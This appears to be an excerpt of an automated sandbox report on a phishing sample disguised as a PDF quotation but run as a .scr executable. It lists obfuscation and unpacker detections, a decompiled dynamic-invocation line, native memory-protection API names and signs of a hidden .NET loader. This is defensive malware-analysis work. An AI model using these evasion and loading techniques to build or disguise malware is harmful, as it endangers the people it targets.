Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE985000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADE4A2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2666267100.0000028AE7130000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADE51A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE985000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADE4A2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2666267100.0000028AE7130000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADE51A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF2E2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2665927288.0000028AE6ED0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF2E2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2665927288.0000028AE6ED0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, FF1YoNsGP8eIQ23Q2kR.cs

.Net Code: Type.GetTypeFromHandle(c0ymbpK5nFyouWuOkHR.KBcirswEBU(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(c0ymbpK5nFyouWuOkHR.KBcirswEBU(16777259)),Type.GetTypeFromHandle(c0ymbpK5nFyouWuOkHR.KBcirswEBU(16777263))})

.NET source code contains potential unpacker

Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade51a3f0.9.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade51a3f0.9.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade51a3f0.9.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade4ca3b8.1.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade4ca3b8.1.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ade4ca3b8.1.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ae6ed0000.12.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ae6ed0000.12.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ae6ed0000.12.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ae6ed0000.12.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ae6ed0000.12.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ae6e50000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf1f39b8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2665435188.0000028AE6E50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2646867703.0000028ACE51D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe PID: 6044, type: MEMORYSTR

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FFD34795CE0 push FFFFFFE8h; ret	0_2_00007FFD34795CF9
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FFD3479814D push ebx; ret	0_2_00007FFD3479816A
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FFD347950D3 push FFFFFFE8h; ret	0_2_00007FFD347950F9
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FFD348B2E29 push eax; iretd	0_2_00007FFD348B2E52
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FFD3495420A push esp; iretd	0_2_00007FFD3495420B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_0000022934010171 push ebp; iretd	5_2_0000022934010172
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 5_2_00007FFD34858169 push ebx; ret	5_2_00007FFD3485816A

Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, o8N7k9dOXypYPqAMSQ.cs	High entropy of concatenated method names: 'QGx5B6RHt', 'HB56g2Flt', 'lkL03q4Vh', 'c2leLdbUZ', 'rAvRYxe3VmqncXgcZGZ', 'p7AGGXezFEuZuht6l8b', 'AiH8He08gcIpNWhtGQq', 'LYLPpb07SCXC7bJrBK0', 'Qu5Q7f0r3rrC33vvC8N', 'wEqHke0TuDu6clIpRvj'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, AssemblyLoader.cs	High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'Orw9BiNvFO2q0eC8Uut'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, RQZxa3jMdhrvAcCuICn.cs	High entropy of concatenated method names: 'Mukjk7benr', 'FA3j3nsPxV', 'rOLs8kYyuH', 'GODZNi9VlMjqpER4H1g', 'nqlCsV99QFJNdIQ5mHy', 'Y9bXyJ9yXf3OFf2WfF4', 'VJQdE29B2V2cyRCEpJG', 'YVSvaJ9NdceSwcyhVtq', 't7GPag9okiu4dgQG9EP'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, aVbhW4sxpqI5kjWpaaF.cs	High entropy of concatenated method names: 'v6Os27ckx4', 'fjCDatN9aLFDS9xhPBk', 'YAQYNyNNcpFAJ0ic6OH', 'YiSJmFNoP7J82rIHFIT', 's8yLO8NF0EXbPE5VMHa', 'lCFUgKNZ9a72SVnwRld', 'XQFIt9NBUd9JeDoR98T', 'EDBbjLNVe8jXOaAhRok'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, dIMFsHmh76WoTpvu4xN.cs	High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'ls1mxa0SPq', 'NtProtectVirtualMemory', 'wHSQtcy4aNuH27KCNw5', 'APjp4Tyt8EkOkcNn8j3', 'FGN0vyyCfdJrpJe55rG', 'FpEiRDyu5X72UwmIdrR'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, x2avBpLhQxpdUaQQ6ws.cs	High entropy of concatenated method names: 'h6aLxA943F', 'mSZLwa6Rq5', 'vHPLrWGnreMIWPR93IB', 'fxfOgIG4xDH6f0XekCp', 'dP6PywGtsUYqTyQVb8v', 'fbDJcnGiCSQvE2lDVst', 'ogtWAOGAvqdI9F31dvN', 'wyJkpLGgN6h6tkfnfAi', 'dVanNOGU7tkJVZtLXOu', 'iMx32CGpxpBPwDyY8LI'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, MHsuAVO89Ma838Xn5R.cs	High entropy of concatenated method names: 'qG9l2uS9i', 'zDyDQUIXY', 'DhCh2ILeN', 'evpqdXdJH', 'ieiJplDQq', 'FMdfRqepTimuBDbG0fs', 'piWxsVef50wELbvTXuO', 'BELgI3eI06l59JQq2cp', 'uvpLsTeHurjoP8gJNni', 'P8FuEDe1XeMeAKbsdK5'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, pk8TeRjEbj78gRXijax.cs	High entropy of concatenated method names: 'xrqjBTLH0g', 'Hy7hYnVuWNbeYtleIxM', 'A2s0v4V4erNeys8LHOB', 'j1U19VVtFIW1U6LPNbe', 'sdXTv9VnCdFqFIaJJnH', 'G8AQesViopi9QNgtXEE', 'gAui42VAfu9idwfDdq3', 'LaagWZVg0JXPI7acKas', 'hOdTYjVZjSFyoSGT9Ql', 'NU5QknVCY2KLsF5TEY1'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, Bv6rWFsrI2Y8xp0b6Hb.cs	High entropy of concatenated method names: 'LC9sPPLjJ5', 'xQRkAx9uQk0a0pp1Slj', 'OXHblZ94Bcomsm0qaRC', 'q1s1uK9t1gqOp0dhv5p', 'XJk0h99nAGwBMZRPLxQ', 'iE9KoU9iKFjvwYBQHWU', 'n25iUJ9Zb5BrgYoFwDl', 'fUgNkm9CvL0ECekkl6Y'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, aHpkZWK1dlnWZ6bvWdT.cs	High entropy of concatenated method names: 'ssnhXK8GHn', 'We7hhvV8Wa', 'MCchqdFOSD', 'RJmhxbRV3u', 'sd8hwxbuQ1', 'gcWh2hO5FO', 'MenhdcesLA', 'Y4IODqHK94', 'yOUhRIZHlX', 'H2bh5CdUwX'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, iaH6c4jIPU8kNU8R6d9.cs	High entropy of concatenated method names: 'xXoj13yxty', 'PIRjvJW1lX', 'MttjShk7ni', 'UoBNc8965GMQnS3MQco', 'zxdUAW9ee8ibNHTqwSQ', 'cHu9hs9RoNcmUtM55FS', 'dHqsBm95uPw1mu2jeWu', 'ARK9QC90lr6hlKKqHbK', 'beFMZx9GetBChIYX2u2'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, eAWhucLB2AAPW4e5xOw.cs	High entropy of concatenated method names: 'cbxL9Nq7Yx', 'SkjLNTfhlU', 'pVcLocH7fd', 'PPbFeSEZ7oLnpue8Pef', 'JYuXkbECkdxDR9AfeAn', 'm6eNtlEuD115VuHLKub', 'waKTSPE4RKmj01mRLb1', 'QM6KOqEoTAfsqyCwv5a', 'Ch5ePQEFTIXZ1NujtHN', 'TjME5iEtssiSXNgD6Jb'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, jpERS1ssS38HEoy0GRE.cs	High entropy of concatenated method names: 'CjksKpGtSF', 'Yt8sOdpXJR', 'okBgKo9SE6GmkEEIBJB', 'zOlorM9vA0dXgTNSLKD', 'pbG7ya9HQq26XwwMfGF', 'KD51vR91d5Eenp43gDn', 'XMeJ2x9W4qV9exFuHfw', 'wEAF0W9MeTLWKeUorb3', 'T6FVo29bxyEOMluSoig', 'vnwCXZ9kf4c4kJBQFCL'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, nDRO8hsDNhaU52TVjPC.cs	High entropy of concatenated method names: 'fxrshI1sCm', 'MBmsq6ZLCh', 'F3NUQFN5paxELeRDvmy', 'NsjSSZN6EP5SWeNxx5K', 'GnknhtNero2vv6obBtX', 'UKpKpKNdNxVCHSVbjoI', 'G0Bss7NRtCcinF9D2pP', 'rvi6RjN0Jtf9q0dqk41', 'psWLIFNGs42cnPtQ6WY', 'eGx76bNEI6Jfxquiqms'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, jvTuJRrX4gk1piCH5TC.cs	High entropy of concatenated method names: 'Bu5rqDLVLw', 'YZNUTl09mtqv3GLpHHT', 'cNhq1m0NVa1ikDVDgdB', 'i50jGj0oFBLr5KErb9i', 'T66oFS0FsUTmKZEPqk5', 'xRjjQx0ZudtiL49J8yI', 'ieRhFb0CiONf72vRccR', 'LW30M00uguGinUS2ar6', 'NfHuUq0426ZZDYemyNA', 'TRJaYK0tDmaLQThhgLb'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, vi2LKGL53YwMYBB6cCm.cs	High entropy of concatenated method names: 'wZCLeySa3E', 'avoL0C7mRm', 'pqJLGK8xDm', 's9GLE3l1vD', 'agwLy2cwyi', 'QSMwhEGkjl4hZHWOeLl', 'frhbDQG3RJol7hdFshs', 'hrSl2PGzCcy7IN5JlPW', 'yLEQAGE89wD09qH671i', 'Am3wI1E7DcnSvgw6Dfc'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, FF1YoNsGP8eIQ23Q2kR.cs	High entropy of concatenated method names: 'EbLkSHoouZHy8v7ImiE', 'YipXTNoFLcKs2BtF4SD', 'huNKPPR8oA', 'bKPjjXo4LG2pbKggZxA', 'inMKH8ot9eb3JZAdxTE', 'EUiflKon6Xfw4TdD8TF', 'IqJqWEoiXjCZXfqpnlE', 'zd2FVWoAt08hqRaETy2', 'lQ7oc8ogrCsCPgihbY4', 'nDxJOgoUSdbKQwFxlCY'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, vd4qFls5WRwjancQki3.cs	High entropy of concatenated method names: 'Qagnz6n3sh', 'niYAV8o5SbHR75HWjeI', 'aaI3n7o6sZ5N8gBdATS', 'Om8uqhoeHlPeqdpSDLT', 'Ek45q3o05DJfxXdSE2L', 'usrH0QoGAKCfWTyoQME', 'nWtwtPodtrX4lY6JL0A', 'WCnpLcoRpqqba1uIwNL', 'oBRub2oEukg8lRoZAH6', 'pUDPptoyOqovHFKMbPq'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, FjHAitjVKo3qIxQNcT2.cs	High entropy of concatenated method names: 'TtXjFm2btC', 'p2jjZUVNbU', 'rJKjNRfJfr', 'LLTjonCjrs', 'iBwS6EVIZmV5nEggNUk', 'rOO9BSVHD3MZYLOQnRT', 'msfWjSV14XZ1wxI6oeD', 'gRVRdOVSrC5GvslfvRi', 'RZGEGGVvcUS1EUTZTV6', 'BqrIg1VpCDLN6u4ZDfm'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, JKrcBoj4Z2y8ctFXIFu.cs	High entropy of concatenated method names: 'FEUjnESkaG', 'yMh51bVzI9uFF3lgQII', 'mH7Ffg98E4Mk2ea3bC9', 'MrQDor97vUeTGb2F1Xh', 'jd60Ax9rsCMUrN1YVIi', 'prCs9i9TklUZO1one29', 'ijm5w69PGkuZx3mJQdk', 'QmtGiA9LB6SAACnrGW3', 'MoBI529mrayTpOthv0E', 'ajX0qc9amnRrSvDqysu'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, RCREv7j6ZiYc0gtE0WM.cs	High entropy of concatenated method names: 'Ra9j0XFgJA', 'xlIjGhUB7O', 'QcksArVjG6odE3oEpT7', 'weauHDVs9IRd9qaliY3', 'l7IfbbVYcNdtn14jyQd', 'ms1ncWVKTSiytnMAACP', 'YGMTt1VOGcoLqCkNHEq', 'IbhKiAVcNpmlPC9UmbO', 'NFYKTAVJLYbdDwpuuCf', 'Ytq9gQVl68NBcQESUU9'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, MQprkFm7gmyPfFRgDko.cs	High entropy of concatenated method names: 'PRfmT1ZYVh', 'tIKmLSJVFE', 'vlwmataPZv', 'aRImjJn6DR', 'KukmsVu1C5', 'sU6mYmkGHT', 'scgmKMa4BX', 'BmymOoqtXc', 'tNnmcGZuid', 'pVmmJomIfR'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, K31p3XKEPuLttjngMib.cs	High entropy of concatenated method names: 'YDGKtQgNPg', 'JW2Kn5Ec9I', 'CPLKieVA4A', 'nlXKA2Y3wa', 'GphKgIyqLv', 'f3sKU01EC7', 'zWlKpiDCfj', 'jIfKfhvJHU', 'cKqKIWGv61', 'dg8KH4B2OO'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28adf0024e8.4.raw.unpack, LpP1VPscH6vAMIhgfkM.cs	High entropy of concatenated method names: 'rJJslituGa', 'cJiVdmNcAtiyO94vxHs', 'CXE8jjNJOAGjYggIQdP', 'xKcbn1Nlus3HKlRWaH3', 'KHN1RYNDDjeM5fTDmlW', 'JpjDgrNXWdkX7cNHNlY', 'krKcTSNheGpLHrjnSXW', 'jXWZgMNqko6fkLth3Pt', 'x0oODxNxTgLkCI8xKrF', 'yi2ZjuNwnYlZYgv7ne4'
Source: 0.2.QUOTATION_SEPQTRA071244#U00faPDF.scr.exe.28ae6d50000.10.raw.unpack, dIMFsHmh76WoTpvu4xN.cs	High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'ls1mxa0SPq', 'NtProtectVirtualMemory', 'wHSQtcy4aNuH27KCNw5', 'APjp4Tyt8EkOkcNn8j3', 'FGN0vyyCfdJrpJe55rG', 'FpEiRDyu5X72UwmIdrR'

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
